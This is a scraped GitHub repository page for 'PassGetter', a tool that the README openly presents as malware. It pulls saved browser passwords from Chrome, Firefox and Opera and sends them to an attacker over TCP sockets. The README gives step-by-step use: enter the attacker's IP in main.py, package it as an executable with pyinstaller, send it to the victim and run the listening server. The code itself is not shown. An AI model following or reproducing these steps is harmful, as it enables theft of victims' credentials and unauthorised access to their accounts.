Skip to content

swagkarna/PassGetter

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PassGetter

Extract saved passwords of the browsers (i.e Chrome, Firefox, Opera) in the form of .db files and transfer them to the attacker via sockets

How it works

alt text

Basically when u send the file to the victim's computer it processes the system information (OS name) and then it searches for the path to the saved credentials of the browser (look into the code for more info) after that it extracts the data in a .db format and sends it to the attacker via TCP.

How to make it work

Put the ip address to your machine in main.py on line 82

host = "<Your_IP>"

Convert the main.py to .exe or a linux binary executable using pyinstaller

pyinstaller --path <Path to Python>\Python\Lib\site-packages\pywin32_system32 --onefile main.py

Then send it to the victim and run the server.py inside the sockets folder

python3 server.py

and wait for the magic to happen

Requirements

Make sure to install the requirements before converting it to .exe or else the conversion will fail

pip install -r requirements.txt

Credits

About

Extract saved passwords of the browsers (i.e Chrome, Firefox, Opera) in the form of .db files and transfer them to the attacker via sockets

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages